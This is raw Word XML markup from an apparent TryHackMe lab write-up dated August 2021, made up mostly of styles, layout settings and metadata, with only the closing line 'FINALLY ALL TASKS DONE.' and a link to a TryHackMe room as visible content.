    <w:p w14:paraId="61BE4CC4" w14:textId="5C93E97F" w:rsidR="00CA1DFA" w:rsidRDefault="00CA1DFA" w:rsidP="002951A8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3171955D" w14:textId="3B8E7618" w:rsidR="00CA1DFA" w:rsidRDefault="00CA1DFA" w:rsidP="002951A8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>FINALLY ALL TASKS DONE.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="635543AB" w14:textId="1909284C" w:rsidR="00CA1DFA" w:rsidRPr="006F1554" w:rsidRDefault="00CA1DFA" w:rsidP="002951A8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="59B3E8FA" wp14:editId="02405EAF">
            <wp:extent cx="4303240" cy="241965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7509" cy="2427676"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00CA1DFA" w:rsidRPr="006F15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47DBF" w14:textId="77777777" w:rsidR="003E1380" w:rsidRDefault="003E1380" w:rsidP="00E16139">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="7BD81F62" w14:textId="77777777" w:rsidR="003E1380" w:rsidRDefault="003E1380" w:rsidP="00E16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078A1" w14:textId="77777777" w:rsidR="003E1380" w:rsidRDefault="003E1380" w:rsidP="00E16139">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="3A4983D5" w14:textId="77777777" w:rsidR="003E1380" w:rsidRDefault="003E1380" w:rsidP="00E161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8E7EAC"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="05086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897E73"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="338041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7687220"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="526C6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692029"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="9FA86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FFC1ABA"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="05086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952252"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="7632CF70"/>
    <w:lvl w:ilvl="0" w:tplc="B88082B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EF7"/>
    <w:rsid w:val="000D5F2B"/>
    <w:rsid w:val="000F1247"/>
    <w:rsid w:val="00116070"/>
    <w:rsid w:val="001F7726"/>
    <w:rsid w:val="002951A8"/>
    <w:rsid w:val="002A4C4B"/>
    <w:rsid w:val="003E1380"/>
    <w:rsid w:val="004070D4"/>
    <w:rsid w:val="00443421"/>
    <w:rsid w:val="00546BC1"/>
    <w:rsid w:val="0059658A"/>
    <w:rsid w:val="005D4CAE"/>
    <w:rsid w:val="005E5B4D"/>
    <w:rsid w:val="00682F2D"/>
    <w:rsid w:val="00685DBF"/>
    <w:rsid w:val="006F1554"/>
    <w:rsid w:val="007918CB"/>
    <w:rsid w:val="00860A13"/>
    <w:rsid w:val="00874895"/>
    <w:rsid w:val="008C2A00"/>
    <w:rsid w:val="00995BD0"/>
    <w:rsid w:val="00AF6684"/>
    <w:rsid w:val="00B31AB3"/>
    <w:rsid w:val="00B57EF7"/>
    <w:rsid w:val="00BE7D07"/>
    <w:rsid w:val="00C47B94"/>
    <w:rsid w:val="00CA1DFA"/>
    <w:rsid w:val="00CE0EAF"/>
    <w:rsid w:val="00E07C87"/>
    <w:rsid w:val="00E1275C"/>
    <w:rsid w:val="00E16139"/>
    <w:rsid w:val="00E25E25"/>
    <w:rsid w:val="00F01BCF"/>
    <w:rsid w:val="00F21439"/>
    <w:rsid w:val="00FA54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05092"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{ECF17E74-0D2F-4BFA-84F1-AFC95611C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F7"/>
    <w:rPr>
      <w:color w:val="0563C1" w:themeColor="hyperlink"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="UnresolvedMention">
    <w:name w:val="Unresolved Mention"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00B57EF7"/>
    <w:rPr>
      <w:color w:val="605E5C"/>
      <w:shd w:val="clear" w:color="auto" w:fill="E1DFDD"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="ListParagraph">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="34"/>
    <w:qFormat/>
    <w:rsid w:val="00546BC1"/>
    <w:pPr>
      <w:ind w:left="720"/>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:styleId="HTMLCode">
    <w:name w:val="HTML Code"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00443421"/>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="NormalWeb">
    <w:name w:val="Normal (Web)"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00F01BC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16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139"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Footer">
    <w:name w:val="footer"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="FooterChar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00E16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1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72869">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="281425815">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="1030450044">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="240"/>
          <w:marBottom w:val="150"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="5341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43701">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="1284799511">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="240"/>
          <w:marBottom w:val="150"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="138656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8110">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="1915167617">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="1230068942">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
          </w:divsChild>
        </w:div>
        <w:div w:id="701395709">
          <w:blockQuote w:val="1"/>
          <w:marLeft w:val="720"/>
          <w:marRight w:val="720"/>
          <w:marTop w:val="100"/>
          <w:marBottom w:val="100"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="dotted" w:sz="6" w:space="8" w:color="666666"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="17854255">
          <w:blockQuote w:val="1"/>
          <w:marLeft w:val="720"/>
          <w:marRight w:val="720"/>
          <w:marTop w:val="100"/>
          <w:marBottom w:val="100"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="dotted" w:sz="6" w:space="8" w:color="666666"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="91628622">
          <w:blockQuote w:val="1"/>
          <w:marLeft w:val="720"/>
          <w:marRight w:val="720"/>
          <w:marTop w:val="100"/>
          <w:marBottom w:val="100"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="dotted" w:sz="6" w:space="8" w:color="666666"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
      </w:divsChild>
    </w:div>
    <w:div w:id="1986003486">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="737900192">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="240"/>
          <w:marBottom w:val="150"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="11742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hyperlink" Target="mailto:Sally.oketch@womentechsters.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hyperlink" Target="https://tryhackme.com/room/ic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16</Pages>
  <Words>1520</Words>
  <Characters>8665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Sally</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Sally</cp:lastModifiedBy>
  <cp:revision>22</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2021-08-23T10:08:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2021-08-23T13:16:00Z</dcterms:modified>
</cp:coreProperties>
</file>